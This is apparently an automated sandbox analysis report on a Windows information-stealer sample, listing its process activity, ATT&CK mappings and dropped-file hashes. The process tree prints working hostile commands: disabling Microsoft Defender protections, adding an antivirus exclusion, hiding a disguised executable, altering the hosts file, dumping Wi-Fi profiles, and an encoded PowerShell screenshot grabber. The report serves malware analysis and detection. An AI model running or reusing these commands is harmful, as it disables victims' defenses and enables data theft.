Token: SeRemoteShutdownPrivilege	2448	wmic.exe
Token: SeUndockPrivilege	2448	wmic.exe
Token: SeManageVolumePrivilege	2448	wmic.exe
Token: 33	2448	wmic.exe
Token: 34	2448	wmic.exe
Token: 35	2448	wmic.exe
Token: 36	2448	wmic.exe
Token: SeIncreaseQuotaPrivilege	3564	wmic.exe
Token: SeSecurityPrivilege	3564	wmic.exe
Token: SeTakeOwnershipPrivilege	3564	wmic.exe
Token: SeLoadDriverPrivilege	3564	wmic.exe
Token: SeSystemProfilePrivilege	3564	wmic.exe
Token: SeSystemtimePrivilege	3564	wmic.exe
Token: SeProfSingleProcessPrivilege	3564	wmic.exe
Token: SeIncBasePriorityPrivilege	3564	wmic.exe
Token: SeCreatePagefilePrivilege	3564	wmic.exe
Token: SeBackupPrivilege	3564	wmic.exe
Token: SeRestorePrivilege	3564	wmic.exe
Token: SeShutdownPrivilege	3564	wmic.exe
Token: SeDebugPrivilege	3564	wmic.exe
Token: SeSystemEnvironmentPrivilege	3564	wmic.exe
Token: SeRemoteShutdownPrivilege	3564	wmic.exe
Token: SeUndockPrivilege	3564	wmic.exe
Token: SeManageVolumePrivilege	3564	wmic.exe
Token: 33	3564	wmic.exe
Token: 34	3564	wmic.exe
Token: 35	3564	wmic.exe
Token: 36	3564	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3936 wrote to memory of 1128	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	86
PID 3936 wrote to memory of 1128	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	86
PID 3936 wrote to memory of 868	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	87
PID 3936 wrote to memory of 868	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	87
PID 3936 wrote to memory of 2448	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	89
PID 3936 wrote to memory of 2448	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	89
PID 3936 wrote to memory of 3564	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	91
PID 3936 wrote to memory of 3564	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	91
PID 3936 wrote to memory of 5040	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	92
PID 3936 wrote to memory of 5040	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	92
PID 3936 wrote to memory of 2164	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	93
PID 3936 wrote to memory of 2164	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	93
PID 3936 wrote to memory of 2224	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	95
PID 3936 wrote to memory of 2224	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	95
PID 3936 wrote to memory of 2892	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	96
PID 3936 wrote to memory of 2892	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	96
PID 3936 wrote to memory of 1000	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	97
PID 3936 wrote to memory of 1000	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	97
PID 3936 wrote to memory of 1812	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	98
PID 3936 wrote to memory of 1812	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	98
PID 3936 wrote to memory of 2984	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	99
PID 3936 wrote to memory of 2984	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	99
PID 3936 wrote to memory of 2408	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	100
PID 3936 wrote to memory of 2408	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	100
PID 3936 wrote to memory of 5052	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	101
PID 3936 wrote to memory of 5052	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	101
PID 3936 wrote to memory of 3124	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	102
PID 3936 wrote to memory of 3124	3936	2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	102
PID 3124 wrote to memory of 4216	3124	powershell.exe	103
PID 3124 wrote to memory of 4216	3124	powershell.exe	103
PID 4216 wrote to memory of 5016	4216	csc.exe	104
PID 4216 wrote to memory of 5016	4216	csc.exe	104

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5052	attrib.exe
1128	attrib.exe
868	attrib.exe
2984	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3936
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
  2⤵
  - Views/modifies file attributes
  PID:1128
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:868
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2024-11-20_1abd63f11821dd425441e659c890632b_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5040
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:2164
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:2224
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1000
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:1812
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:2984
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:2408
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:5052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rzp13xfs\rzp13xfs.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4216
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82FB.tmp" "c:\Users\Admin\AppData\Local\Temp\rzp13xfs\CSC77CE57F1304F4526BB3C772647EE223.TMP"
      4⤵
      PID:5016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef647504cf229a16d02de14a16241b90

SHA1
81480caca469857eb93c75d494828b81e124fda0

SHA256
47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

SHA512
a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES82FB.tmp

Filesize
1KB

MD5
bbae6f27b1f1dad712379ae9dc9df9c2

SHA1
748238e382bdb76733afca624b32606421a252bb

SHA256
00f9ee3510fa6e0e9cafca7450eb7f857730c9acecc0dbd250dbb899157bd057

SHA512
0032fc567b64894deb22100eb3f7dc895f7ff9f78d8d74286f54de5cff372a16ed11f54da87b6f1863d8d07202063cec658c78a2ffe5110308462f3e496d50a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RG8dqoSinQ\Display (1).png

Filesize
412KB

MD5
d942fd8a153f0ff0af9f6398d38dc147

SHA1
711cbe4c823cac9a4d2467a0f29c0a08ff133f83

SHA256
57b16b293aa397d3cc1ce3913756f379960d61964f829cfe7b2612321d588314

SHA512
2ce8747a0be17e3c13cce42fbfba5e549cc593c9920f59846717115579dffff49918fda3f8610efe3f06c76d12df17ac47ffd290d7352a6827a1f98adec99dab

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ghwdzjap.bh3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rzp13xfs\rzp13xfs.dll

Filesize
4KB

MD5
d074043afa5ccfb4f9f7fe82f9598e58

SHA1
33075cc431337b28229d3b82155958cd7e6a87c5

SHA256
7d4bac3c89c01d70a8e369d0fa071f0c954a4955ce0e1f2a8f858b7383b7a328

SHA512
3144118c12d2b4f61e528496acf0a47fd9cd5343a717a3b11b209984498001c466e33d68687039d28524b544d0f9be9188067e26561eab9a0823f4bcf09fe1a2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.9MB

MD5
1abd63f11821dd425441e659c890632b

SHA1
e4772d6e84217f0c0ff15aa5580a13f3424d2ac0

SHA256
5dc88f47dfefad9feb60493de86d4bbdd407b158f4b6c768759e726ce497754f

SHA512
29eeab5c7c06b83f0557a375c3faf1fd868dfb2d89f2035728197a45bcb664e951fabfbb5191857beb576a8de3a009aef2f7a760d52305c14c754573e9d3b06e

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rzp13xfs\CSC77CE57F1304F4526BB3C772647EE223.TMP

Filesize
652B

MD5
22e5c21cc341846fc681613d0d4e397f

SHA1
17d2daf802cbcd611ad173b0882d95a2edf6f44c

SHA256
57767c69a0265a020b6c879c9c790dd049c2549a2dd400cdbcaaff9354a94e42

SHA512
a492b219d092df17b0fdd86074fc09144185546df2c54e90dcf226407197f76f7382bc11f896258665581ac36597804d18070b96e3ca4874a836ff301682faff

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rzp13xfs\rzp13xfs.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rzp13xfs\rzp13xfs.cmdline

Filesize
607B

MD5
090a1493f2d880864db2ecbfa9be8c7b

SHA1
1b7c0e4ba53b65fdfa3cb425b38e6788385de223

SHA256
8d1f099ec8b085eabf97262d2af99af18b2b19f610e4d35480d22ad52296a273

SHA512
eedddd83b2ffd99bf3b5d508b0c38341a664caa5b14c0768862761c2da19c4131641fc9d953dc7653614942967ae36ab719270fb7ea696e87d1bf79d725e2e9b

Download Submit
memory/3124-59-0x0000023BDE050000-0x0000023BDE058000-memory.dmp

Filesize
32KB

Download
memory/5040-4-0x0000015F2D3B0000-0x0000015F2D3D2000-memory.dmp

Filesize
136KB

Download